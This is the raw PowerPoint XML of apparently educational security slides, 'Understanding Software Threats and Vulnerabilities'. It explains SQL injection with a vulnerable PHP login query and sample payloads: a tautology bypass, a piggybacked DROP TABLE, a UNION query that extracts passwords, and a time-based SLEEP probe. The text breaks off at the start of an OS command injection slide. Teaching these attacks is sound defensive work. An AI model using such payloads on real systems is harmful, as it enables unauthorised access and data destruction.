Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/></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15.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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9.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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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9.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30.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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32.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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33.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5.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5.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0.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0.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0.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0.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0.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0.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0.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0.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0.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C0F6DFA6-57EE-444B-8CA9-354CEBE95056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779838" y="5537200"/>
            <a:ext cx="4895850" cy="765175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Security Planning</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Susan Lincke</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57927F60-56C2-4888-84E7-849D23C0108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771900" y="4165600"/>
            <a:ext cx="4903788" cy="886397"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>Understanding Software Threats and Vulnerabilities</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93198426-40F7-41C1-8B53-31764488502A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="671512"/>
            <a:ext cx="8229600" cy="1157287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack: SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6176875-474A-4EA1-8F12-74CFDFD41EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1516063"/>
            <a:ext cx="5029200" cy="4808537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tautology:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>PHP Original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>users_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> WHERE username= “ ’ . $_POST[‘username’] . ‘ “ AND password = “‘ $_POST[‘password’] . ‘“ ‘;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Inserted Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>: Aa’ OR 1 = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SQL Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>users_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> WHERE username=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>anyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>’ AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Aa’ OR 1 = 1”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Piggybacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Inserted Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>: foo’; drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>users_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> –’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SQL Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>users_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> WHERE username=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>anyname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>’ AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>foo’; drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>users_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t> -’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A765B7A-F8D0-4BC4-B6D4-99563EA62AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2362200"/>
            <a:ext cx="2667000" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="25000"/>
              <a:lumOff val="75000"/>
            </a:schemeClr>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Login:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>Password: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBF000D-03A0-4B20-8EDF-5FEACCBEDD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3810000"/>
            <a:ext cx="1295400" cy="304800"/>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17414" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD710984-2CA1-4AB3-AA17-62BB4EB3DB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4648200"/>
            <a:ext cx="1295400" cy="304800"/>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17415" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B14883-FC59-49A2-BCF1-5A5FDB5B17D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2590800"/>
            <a:ext cx="272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b="1"/>
              <a:t>Welcome to My System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17416" name="Picture 8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E40178-7ACC-428E-B6A6-0160FAA5A2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7620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7" name="Picture 9" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CA1822-39F7-4C3D-92B1-3744D42DCC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7620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8" name="Picture 10" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC562819-89D2-4559-8A38-44CC601B07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7620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7498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93198426-40F7-41C1-8B53-31764488502A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="677862"/>
            <a:ext cx="8229600" cy="1150937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack: SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6176875-474A-4EA1-8F12-74CFDFD41EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1516063"/>
            <a:ext cx="5029200" cy="4808537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Union Queries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SQL Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  “SELECT * FROM cars WHERE description LIKE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>%” UNION SELECT username, password FROM users; -% “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Database Structure Queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SQL Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  “SELECT name, description FROM cars WHERE description LIKE “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t>%” AND LENGTH (database() = 19); -% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SQL Result:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>SELECT * FROM cars WHERE description LIKE “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="D1D1FF"/>
                </a:highlight>
              </a:rPr>
              <a:t> AND (SELECT SLEEP(10) FROM DUAL WHERE SUBSTRING(database(),1,1)=“B”); --” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>AND password = “%”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A765B7A-F8D0-4BC4-B6D4-99563EA62AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2362200"/>
            <a:ext cx="2667000" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="25000"/>
              <a:lumOff val="75000"/>
            </a:schemeClr>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Car size:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Car brand: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBF000D-03A0-4B20-8EDF-5FEACCBEDD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3810000"/>
            <a:ext cx="1295400" cy="304800"/>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17414" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD710984-2CA1-4AB3-AA17-62BB4EB3DB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4648200"/>
            <a:ext cx="1295400" cy="304800"/>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17415" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B14883-FC59-49A2-BCF1-5A5FDB5B17D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942697" y="2594531"/>
            <a:ext cx="2287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b="1" dirty="0"/>
              <a:t>Automobile Search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17416" name="Picture 8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E40178-7ACC-428E-B6A6-0160FAA5A2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7620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7" name="Picture 9" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CA1822-39F7-4C3D-92B1-3744D42DCC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7620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8" name="Picture 10" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC562819-89D2-4559-8A38-44CC601B07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7620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56614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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DDA042-578E-451E-8876-C8A7736703C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>Attack: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>OS Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53851018-BFC4-4A14-922C-B27D85AEFBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="3505200" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
